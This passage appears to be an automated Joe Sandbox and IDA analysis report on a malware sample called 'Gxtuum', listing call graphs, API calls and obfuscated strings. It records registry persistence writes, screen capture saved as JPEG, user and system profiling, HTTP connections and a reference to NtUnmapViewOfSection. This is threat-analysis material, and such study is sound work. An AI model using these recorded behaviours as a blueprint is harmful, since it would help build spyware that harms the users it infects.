calls 32271 ea5ce 32269->32271 32272 10f419 25 API calls 32270->32272 32271->32215 32274 ea5d7 32272->32274 32273->32269 32276 e9ffd 32275->32276 32285 e9f47 shared_ptr 32275->32285 32277 104640 27 API calls 32276->32277 32283 ea053 32277->32283 32278 ea09c 32302 104b50 27 API calls 32278->32302 32280 104640 27 API calls 32280->32285 32282 ea079 shared_ptr 32282->32225 32283->32282 32284 10f419 25 API calls 32283->32284 32284->32278 32285->32276 32285->32278 32285->32280 32285->32283 32287 1035c0 32286->32287 32290 1035d7 _Yarn 32287->32290 32303 1058b0 27 API calls 3 library calls 32287->32303 32289 103612 32289->32241 32290->32241 32304 10e50e 32291->32304 32295 f0fd9 32294->32295 32296 f1041 shared_ptr 32295->32296 32299 f1076 32295->32299 32297 109db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 32296->32297 32298 f1063 32297->32298 32298->32252 32300 10f419 25 API calls 32299->32300 32301 f107b 32300->32301 32303->32289 32306 10e51a __FrameHandler3::FrameUnwindToState 32304->32306 32305 10e521 32329 111652 14 API calls __dosmaperr 32305->32329 32306->32305 32308 10e541 32306->32308 32310 10e553 32308->32310 32311 10e546 32308->32311 32309 10e526 32330 10f409 25 API calls __fread_nolock 32309->32330 32321 117412 32310->32321 32331 111652 14 API calls __dosmaperr 32311->32331 32316 10e563 32332 111652 14 API calls __dosmaperr 32316->32332 32318 10e570 32333 10e5ae LeaveCriticalSection __fread_nolock 32318->32333 32320 f9d0d 32320->32246 32322 11741e __FrameHandler3::FrameUnwindToState 32321->32322 32334 112ae0 EnterCriticalSection 32322->32334 32324 11742c 32335 1174b6 32324->32335 32329->32309 32330->32320 32331->32320 32332->32320 32333->32320 32334->32324 32344 1174d9 32335->32344 32336 117439 32349 117472 32336->32349 32337 117531 32354 11ab80 14 API calls 3 library calls 32337->32354 32339 11753a 32341 1185a6 _free 14 API calls 32339->32341 32342 117543 32341->32342 32342->32336 32355 118e49 6 API calls std::_Lockit::_Lockit 32342->32355 32344->32336 32344->32337 32352 11132f EnterCriticalSection 32344->32352 32353 111343 LeaveCriticalSection 32344->32353 32345 117562 32356 11132f EnterCriticalSection 32345->32356 32348 117575 32348->32336 32357 112b28 LeaveCriticalSection 32349->32357 32351 10e55c 32351->32316 32351->32318 32352->32344 32353->32344 32354->32339 32355->32345 32356->32348 32357->32351 32358 f9eb0 32359 e9a20 119 API calls 32358->32359 32360 f9eea 32359->32360 32361 103730 70 API calls 32360->32361 32362 fa205 32361->32362 32363 e61f0 114 API calls 32362->32363 32364 fa20d 32363->32364 32365 103730 70 API calls 32364->32365 32366 fa21f 32365->32366 32367 e61f0 114 API calls 32366->32367 32368 fa22a 32367->32368 32369 105b30 27 API calls 32368->32369 32370 fa23e 32369->32370 32371 103730 70 API calls 32370->32371 32372 fa52b 32371->32372 32373 e61f0 114 API calls 32372->32373 32374 fa536 32373->32374 32375 103730 70 API calls 32374->32375 32376 fa548 32375->32376 32377 e61f0 114 API calls 32376->32377 32378 fa553 32377->32378 32379 105b30 27 API calls 32378->32379 32380 fa567 32379->32380 32381 103730 70 API calls 32380->32381 32382 fa863 32381->32382 32383 e61f0 114 API calls 32382->32383 32384 fa86e 32383->32384 32385 103730 70 API calls 32384->32385 32386 fa880 32385->32386 32387 e61f0 114 API calls 32386->32387 32388 fa88b 32387->32388 32389 105b30 27 API calls 32388->32389 32390 fa89f 32389->32390 32391 fac5f shared_ptr 32390->32391 32393 faca8 32390->32393 32392 109db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 32391->32392 32394 fac81 32392->32394 32395 10f419 25 API calls 32393->32395 32396 facad 32395->32396
                                                                APIs
                                                                • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,455139FB,455139FB), ref: 000E639C
                                                                • RegQueryValueExA.KERNELBASE(455139FB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,455139FB,455139FB), ref: 000E63CA
                                                                • RegCloseKey.KERNELBASE(455139FB,?,?,00000000,00000001,455139FB,455139FB), ref: 000E63D6
                                                                • RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 000E64E3
                                                                • RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 000E6511
                                                                • RegCloseKey.ADVAPI32(80000001), ref: 000E651A
                                                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 000E663C
                                                                • RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 000E665F
                                                                  • Part of subcall function 000E61F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 000E67BD
                                                                  • Part of subcall function 000E61F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 000E6894
                                                                  • Part of subcall function 000E61F0: RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 000E68E0
                                                                • RegCloseKey.ADVAPI32(80000002), ref: 000E6668
                                                                • RegCloseKey.ADVAPI32(?), ref: 000E6D5E
                                                                • GdiplusStartup.GDIPLUS(?,?,00000000,455139FB,00000000), ref: 000E6DEA
                                                                • GetDC.USER32(00000000), ref: 000E6F62
                                                                • RegGetValueA.ADVAPI32(80000002,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000E71CD
                                                                • GetSystemMetrics.USER32(00000000), ref: 000E7226
                                                                • GetSystemMetrics.USER32(00000000), ref: 000E722F
                                                                • RegGetValueA.ADVAPI32(80000002,?,00000000), ref: 000E7277
                                                                • GetSystemMetrics.USER32(00000001), ref: 000E72CA
                                                                • GetSystemMetrics.USER32(00000001), ref: 000E72D3
                                                                • CreateCompatibleDC.GDI32(?), ref: 000E72DF
                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 000E72F4
                                                                • SelectObject.GDI32(00000000,00000000), ref: 000E7304
                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 000E732A
                                                                • GdipCreateBitmapFromHBITMAP.GDIPLUS(00000000,00000000,?), ref: 000E733E
                                                                • GdipGetImageEncodersSize.GDIPLUS(00000000,?), ref: 000E735A
                                                                • GdipGetImageEncoders.GDIPLUS(00000000,00000000,00000000), ref: 000E7387
                                                                • GdipSaveImageToFile.GDIPLUS(00000000,00000000,?,00000000), ref: 000E740E
                                                                • SelectObject.GDI32(00000000,?), ref: 000E741B
                                                                • DeleteObject.GDI32(00000000), ref: 000E7428
                                                                • DeleteObject.GDI32(?), ref: 000E7430
                                                                • ReleaseDC.USER32(00000000,?), ref: 000E743A
                                                                • GdipDisposeImage.GDIPLUS(00000000), ref: 000E7441
                                                                • GdiplusShutdown.GDIPLUS(?), ref: 000E74E3
                                                                • GetUserNameA.ADVAPI32(?,?), ref: 000E75BA
                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 000E7600
                                                                • GetSidIdentifierAuthority.ADVAPI32(?), ref: 000E760D
                                                                • GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000E7721
                                                                • GetSidSubAuthority.ADVAPI32(?,00000000), ref: 000E7748
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Value$Gdip$CloseImageMetricsObjectOpenSystem$AuthorityCreate$BitmapCompatibleDeleteEncodersGdiplusNameQuerySelect$AccountCountDisposeEnumFileFromIdentifierInfoLookupReleaseSaveShutdownSizeStartupUser
                                                                • String ID: $($0vAqKtr=$MK1mbG==$NtUnmapViewOfSection$OKVmbG==$PvAqKtr4MOi=$PvAqKtr4MXW=$PvAqKtr4MeG=$PvAqKtr4MeK=$Xq0f xLx$YeleXM0NRv==$image/jpeg$invalid stoi argument$ntdll.dll$stoi argument out of range
                                                                • API String ID: 1729688432-2403203450
                                                                • Opcode ID: 8c85f6bfab81463327512143d77e6d89d30a4214b70ea90278b00604431ce84a
                                                                • Instruction ID: fecab7532b2ecc797bced97e34e906cbbad1d7e42fd37441656de5bfdcbdab8f
                                                                • Opcode Fuzzy Hash: 8c85f6bfab81463327512143d77e6d89d30a4214b70ea90278b00604431ce84a
                                                                • Instruction Fuzzy Hash: BBD2F371A002589FDB18DF28DC89BEDBB75EF55300F508298E409E72D2DB759AC48F91

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1254 f9f31-f9f9a call 103730 * 2 call e61f0 call e9c20 1263 fac85-fac8a call 104b50 1254->1263 1264 f9fa0-f9fcf call 104640 1254->1264 1270 facad-facaf 1263->1270 1271 fac8a call 10f419 1263->1271 1269 f9fd0-f9ff0 1264->1269 1269->1269 1272 f9ff2-fa007 1269->1272 1271->1270 1273 fa009-fa010 call 104640 1272->1273 1274 fa015-fa0df call 103730 * 2 call e61f0 call e9c20 call 104640 call 105b30 * 2 call 103670 1272->1274 1273->1274 1292 fa0e1-fa0f0 1274->1292 1293 fa110-fa11d 1274->1293 1294 fa106-fa10d call 10a429 1292->1294 1295 fa0f2-fa100 1292->1295 1296 fa11f-fa12e 1293->1296 1297 fa14e-fa158 1293->1297 1294->1293 1295->1294 1300 faca8 call 10f419 1295->1300 1302 fa144-fa14b call 10a429 1296->1302 1303 fa130-fa13e 1296->1303 1298 fa15a-fa166 1297->1298 1299 fa186-fa190 1297->1299 1305 fa17c-fa183 call 10a429 1298->1305 1306 fa168-fa176 1298->1306 1307 fa1be-fa1c8 1299->1307 1308 fa192-fa19e 1299->1308 1300->1270 1302->1297 1303->1300 1303->1302 1305->1299 1306->1300 1306->1305 1311 fa1ca-fa1d6 1307->1311 1312 fa1f6-fac3f call 103730 call e61f0 call 103730 call e61f0 call 105b30 call 103730 call e61f0 call 103730 call e61f0 call 105b30 call 103730 call e61f0 call 103730 call e61f0 call 105b30 1307->1312 1315 fa1b4-fa1bb call 10a429 1308->1315 1316 fa1a0-fa1ae 1308->1316 1317 fa1ec-fa1f3 call 10a429 1311->1317 1318 fa1d8-fa1e6 1311->1318 1366 fac69-fac84 call 109db0 1312->1366 1367 fac41-fac4d 1312->1367 1315->1307 1316->1300 1316->1315 1317->1312 1318->1300 1318->1317 1368 fac5f-fac66 call 10a429 1367->1368 1369 fac4f-fac5d 1367->1369 1368->1366 1369->1300 1369->1368
                                                                APIs
                                                                • GetFileAttributesA.KERNEL32(?,?,00000000,00000000,00147494,0000000E,455139FB,?,00000000), ref: 000FAD5D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID: %$%$%$---$0s==$246122658369$2LI=$2LM=$2Phf$2vE=$2yxm$= N$OTBmbM5tbiKv$P?}$PCm$PV}$PXm$RQ$RQ%$RQE$RQM$RQP$RQS$RQ$mm
                                                                • API String ID: 3188754299-1912422534
                                                                • Opcode ID: c1604ee1f5e871550b20ebf0520fa2d6df9d1fab7abe3e23dfba23bcdbc74072
                                                                • Instruction ID: f65a78bc4012d3589a18d40f1aaba830951c021b788fe3d1fac55ed5be020d00
                                                                • Opcode Fuzzy Hash: c1604ee1f5e871550b20ebf0520fa2d6df9d1fab7abe3e23dfba23bcdbc74072
                                                                • Instruction Fuzzy Hash: BB434BB1A0024C9BEF08DB78CD4A7EDBB76AF51300F54819CE445A76C3DB759A84CB92
                                                                APIs
                                                                  • Part of subcall function 000EA270: GetTempPathA.KERNELBASE(00000104,?,455139FB,?,00000000), ref: 000EA2B7
                                                                • GetFileAttributesA.KERNELBASE(?,?,00000000,00000000), ref: 000EB77B
                                                                  • Part of subcall function 000E61F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,455139FB,455139FB), ref: 000E639C
                                                                  • Part of subcall function 000E61F0: RegQueryValueExA.KERNELBASE(455139FB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,455139FB,455139FB), ref: 000E63CA
                                                                  • Part of subcall function 000E61F0: RegCloseKey.KERNELBASE(455139FB,?,?,00000000,00000001,455139FB,455139FB), ref: 000E63D6
                                                                • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 000EB8B5
                                                                • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 000EB9EF
                                                                  • Part of subcall function 000E61F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 000E64E3
                                                                  • Part of subcall function 000E61F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 000E6511
                                                                  • Part of subcall function 000E61F0: RegCloseKey.ADVAPI32(80000001), ref: 000E651A
                                                                • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 000EBB29
                                                                • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 000EBC63
                                                                  • Part of subcall function 000E61F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 000E663C
                                                                  • Part of subcall function 000E61F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 000E665F
                                                                  • Part of subcall function 000E61F0: RegCloseKey.ADVAPI32(80000002), ref: 000E6668
                                                                • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 000EBD9D
                                                                • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 000EBED7
                                                                  • Part of subcall function 000E61F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 000E67BD
                                                                • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 000EC011
                                                                  • Part of subcall function 000E61F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 000E6894
                                                                  • Part of subcall function 000E61F0: RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 000E68E0
                                                                • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 000EC14B
                                                                • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 000EC285
                                                                • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 000EC3BF
                                                                  • Part of subcall function 000E61F0: RegCloseKey.ADVAPI32(?), ref: 000E6D5E
                                                                • GetFileAttributesA.KERNELBASE(?,?,00000000,00000000), ref: 000EC4FF
                                                                  • Part of subcall function 000E93D0: GetVersionExW.KERNEL32(0000011C,455139FB,74DF0F00), ref: 000E944A
                                                                  • Part of subcall function 000E93D0: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000E94AB
                                                                  • Part of subcall function 000E93D0: GetProcAddress.KERNEL32(00000000), ref: 000E94B2
                                                                  • Part of subcall function 000E93D0: GetNativeSystemInfo.KERNELBASE(?), ref: 000E9573
                                                                  • Part of subcall function 000E93D0: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000E9577
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile$CloseOpenValue$Info$QuerySystem$AddressEnumHandleModuleNativePathProcTempVersion
                                                                • String ID: TNZB$TPZjacv=$TU9n SIz$UNNzTq==$We9sbw0y$XU9q9w0D
                                                                • API String ID: 3951112935-471495615
                                                                • Opcode ID: 4f35b8bdafbccf485c791664a2dfba41c061b19c24017cffc698f4d622c46b61
                                                                • Instruction ID: c556114593032ae7d28ce16bbb8c0aae69335794b519202e093846e7b19585f2
                                                                • Opcode Fuzzy Hash: 4f35b8bdafbccf485c791664a2dfba41c061b19c24017cffc698f4d622c46b61
                                                                • Instruction Fuzzy Hash: B0924B71A002889FEF18DB79CD89BEEBB71AF45310F64821CE050B73D6D7B65A818B51

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2252 ee8d0-ee94a GetUserNameA 2253 ee951-ee956 2252->2253 2253->2253 2254 ee958-eec5c call 104640 call 106660 call 106a00 call 106660 call 106a00 call 103730 call 106660 call 106a00 call 106660 call 106a00 call 106660 call 106a00 CoInitialize 2253->2254 2279 eec5e-eec7b CoCreateInstance 2254->2279 2280 eec87 2254->2280 2281 ef00d-ef033 2279->2281 2282 eec81 CoUninitialize 2279->2282 2283 eec89-eec92 2280->2283 2293 ef0de-ef1b1 call 10ba40 call 1121e3 call 10f0e7 call e2400 2281->2293 2294 ef039-ef03e 2281->2294 2282->2280 2284 eecc9-eecef 2283->2284 2285 eec94-eeca9 2283->2285 2289 eed26-eed4c 2284->2289 2290 eecf1-eed06 2284->2290 2287 eecbf-eecc6 call 10a429 2285->2287 2288 eecab-eecb9 2285->2288 2287->2284 2288->2287 2295 ef48d call 10f419 2288->2295 2291 eed4e-eed63 2289->2291 2292 eed83-eeda9 2289->2292 2297 eed1c-eed23 call 10a429 2290->2297 2298 eed08-eed16 2290->2298 2299 eed79-eed80 call 10a429 2291->2299 2300 eed65-eed73 2291->2300 2301 eedda-eedfe 2292->2301 2302 eedab-eedba 2292->2302 2394 ef1b4-ef1b9 2293->2394 2294->2280 2303 ef044-ef053 2294->2303 2307 ef492 call 10f419 2295->2307 2297->2289 2298->2295 2298->2297 2299->2292 2300->2295 2300->2299 2312 eee35-eee5b 2301->2312 2313 eee00-eee15 2301->2313 2309 eedbc-eedca 2302->2309 2310 eedd0-eedd7 call 10a429 2302->2310 2330 ef06c-ef0d9 CoUninitialize call 103730 * 4 call ee8d0 2303->2330 2331 ef055-ef067 CoUninitialize 2303->2331 2324 ef497 call 10f419 2307->2324 2309->2295 2309->2310 2310->2301 2316 eee5d-eee72 2312->2316 2317 eee92-eeeb8 2312->2317 2321 eee2b-eee32 call 10a429 2313->2321 2322 eee17-eee25 2313->2322 2325 eee88-eee8f call 10a429 2316->2325 2326 eee74-eee82 2316->2326 2327 eeeba-eeec9 2317->2327 2328 eeee9-eef0a 2317->2328 2321->2312 2322->2295 2322->2321 2344 ef49c-ef4a1 call 10f419 2324->2344 2325->2317 2326->2295 2326->2325 2336 eeedf-eeee6 call 10a429 2327->2336 2337 eeecb-eeed9 2327->2337 2338 eef0c-eef18 2328->2338 2339 eef38-eef50 2328->2339 2330->2283 2331->2280 2336->2328 2337->2295 2337->2336 2341 eef2e-eef35 call 10a429 2338->2341 2342 eef1a-eef28 2338->2342 2345 eef7e-eef96 2339->2345 2346 eef52-eef5e 2339->2346 2341->2339 2342->2295 2342->2341 2356 eef98-eefa4 2345->2356 2357 eefc4-eefdc 2345->2357 2354 eef74-eef7b call 10a429 2346->2354 2355 eef60-eef6e 2346->2355 2354->2345 2355->2295 2355->2354 2366 eefba-eefc1 call 10a429 2356->2366 2367 eefa6-eefb4 2356->2367 2360 ef46f-ef48c call 109db0 2357->2360 2361 eefe2-eefee 2357->2361 2368 eeff4-ef002 2361->2368 2369 ef465-ef46c call 10a429 2361->2369 2366->2357 2367->2295 2367->2366 2368->2295 2375 ef008 2368->2375 2369->2360 2375->2369 2394->2394 2395 ef1bb-ef1fa call 104640 call 11227f 2394->2395 2400 ef1fc-ef20b 2395->2400 2401 ef22b-ef27d call 1121e3 call 10f0e7 call e2400 2395->2401 2402 ef20d-ef21b 2400->2402 2403 ef221-ef228 call 10a429 2400->2403 2412 ef280-ef285 2401->2412 2402->2307 2402->2403 2403->2401 2412->2412 2413 ef287-ef2c6 call 104640 call 11227f 2412->2413 2418 ef2c8-ef2d7 2413->2418 2419 ef2f7-ef34d call 1121e3 call 10f0e7 call e2400 2413->2419 2420 ef2ed-ef2f4 call 10a429 2418->2420 2421 ef2d9-ef2e7 2418->2421 2430 ef350-ef355 2419->2430 2420->2419 2421->2324 2421->2420 2430->2430 2431 ef357-ef396 call 104640 call 11227f 2430->2431 2436 ef398-ef3a7 2431->2436 2437 ef3c7-ef460 CoUninitialize 2431->2437 2438 ef3bd-ef3c4 call 10a429 2436->2438 2439 ef3a9-ef3b7 2436->2439 2437->2283 2438->2437 2439->2344 2439->2438
                                                                APIs
                                                                • GetUserNameA.ADVAPI32(?,?), ref: 000EE91D
                                                                • CoInitialize.OLE32(00000000), ref: 000EEC54
                                                                • CoCreateInstance.OLE32(0013DFEC,00000000,00000001,0013E04C,?), ref: 000EEC73
                                                                • CoUninitialize.OLE32 ref: 000EEC81
                                                                • CoUninitialize.OLE32 ref: 000EF055
                                                                • CoUninitialize.OLE32 ref: 000EF06C
                                                                • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 000EF455
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Uninitialize$CreateInitializeInstanceNameUser
                                                                • String ID: @3P$GIonJIRxLNY=$OK0HA7==$OK0nJIRx$Xw9NTq==$dzRUatfzLr==$dzRUaxD Lt6=
                                                                • API String ID: 1775936440-1339055660
                                                                • Opcode ID: 27c526320a1d53a7e8714c6ff2a8abc3b667f40c7553532ad2cfa2f9ef7088c5
                                                                • Instruction ID: 29f9de5920c34a5c50c6ace5dee5530a84e1e1b5c83468e0afdbcfa331ce3ecf
                                                                • Opcode Fuzzy Hash: 27c526320a1d53a7e8714c6ff2a8abc3b667f40c7553532ad2cfa2f9ef7088c5
                                                                • Instruction Fuzzy Hash: 5B62AC71A002999FDF24DF24CC88BDDBBB9AF49304F5081E8E409A7292DB759B84CF51
                                                                APIs
                                                                  • Part of subcall function 000F05B0: Sleep.KERNELBASE(000005DC,455139FB,?,00000000), ref: 000F0642
                                                                  • Part of subcall function 000F05B0: InternetOpenW.WININET(0013DB90,00000000,00000000,00000000,00000000), ref: 000F0651
                                                                  • Part of subcall function 000F05B0: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 000F0675
                                                                  • Part of subcall function 000F05B0: HttpOpenRequestA.WININET(?,00000000), ref: 000F06BF
                                                                  • Part of subcall function 000E61F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,455139FB,455139FB), ref: 000E639C
                                                                  • Part of subcall function 000E61F0: RegQueryValueExA.KERNELBASE(455139FB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,455139FB,455139FB), ref: 000E63CA
                                                                  • Part of subcall function 000E61F0: RegCloseKey.KERNELBASE(455139FB,?,?,00000000,00000001,455139FB,455139FB), ref: 000E63D6
                                                                  • Part of subcall function 000E61F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 000E64E3
                                                                  • Part of subcall function 000E61F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 000E6511
                                                                  • Part of subcall function 000E61F0: RegCloseKey.ADVAPI32(80000001), ref: 000E651A
                                                                • RegOpenKeyExA.KERNELBASE(80000002,System,00000000,000F003F,?,00000000), ref: 000FF832
                                                                • RegCloseKey.KERNELBASE(80000002), ref: 000FF848
                                                                  • Part of subcall function 000E61F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 000E663C
                                                                  • Part of subcall function 000E61F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 000E665F
                                                                  • Part of subcall function 000E61F0: RegCloseKey.ADVAPI32(80000002), ref: 000E6668
                                                                • GetUserNameA.ADVAPI32(?,80000002), ref: 000FF8D2
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 000FF95D
                                                                  • Part of subcall function 000E61F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 000E67BD
                                                                  • Part of subcall function 000E61F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 000E6894
                                                                  • Part of subcall function 000E61F0: RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 000E68E0
                                                                  • Part of subcall function 000E61F0: RegCloseKey.ADVAPI32(?), ref: 000E6D5E
                                                                  • Part of subcall function 000E61F0: GdiplusStartup.GDIPLUS(?,?,00000000,455139FB,00000000), ref: 000E6DEA
                                                                  • Part of subcall function 000E61F0: GetDC.USER32(00000000), ref: 000E6F62
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Open$Close$Value$InternetNameQuery$ConnectEnumFileGdiplusHttpInfoModuleRequestSleepStartupUser
                                                                • String ID: 0f3be6$1PI0$1PY0$1ek0$246122658369$2y00$Lo==$QK4rKq==$R$SyM+$SyQ+$System$dOQ0$eUc0$eVM0$ezY0$fUQ0$fVQ3am==$fb0=$fyM0$gO40$gfM0$invalid stoi argument$stoi argument out of range
                                                                • API String ID: 2912196086-31716519
                                                                • Opcode ID: 060c324126204da842a24fa4f05748561c85416ea5b4dc73349326312a2ffc31
                                                                • Instruction ID: 43db2b1fa9ee3504b6cb4e4ebcbde66b741484f9ef50d73bb229eb5f40031251
                                                                • Opcode Fuzzy Hash: 060c324126204da842a24fa4f05748561c85416ea5b4dc73349326312a2ffc31
                                                                • Instruction Fuzzy Hash: 5D133571A002489BEB19DB28CD897EDBB76AF55304F5481DCE048A72D2DBB58FC48F91
                                                                APIs
                                                                  • Part of subcall function 000E61F0: GetUserNameA.ADVAPI32(?,?), ref: 000E75BA
                                                                  • Part of subcall function 000E61F0: LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 000E7600
                                                                  • Part of subcall function 000E61F0: GetSidIdentifierAuthority.ADVAPI32(?), ref: 000E760D
                                                                • RegOpenKeyExA.KERNELBASE(80000002,System,00000000,000F003F,?,00000000), ref: 000FF832
                                                                • RegCloseKey.KERNELBASE(80000002), ref: 000FF848
                                                                • GetUserNameA.ADVAPI32(?,80000002), ref: 000FF8D2
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 000FF95D
                                                                  • Part of subcall function 000E61F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,455139FB,455139FB), ref: 000E639C
                                                                  • Part of subcall function 000E61F0: RegQueryValueExA.KERNELBASE(455139FB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,455139FB,455139FB), ref: 000E63CA
                                                                  • Part of subcall function 000E61F0: RegCloseKey.KERNELBASE(455139FB,?,?,00000000,00000001,455139FB,455139FB), ref: 000E63D6
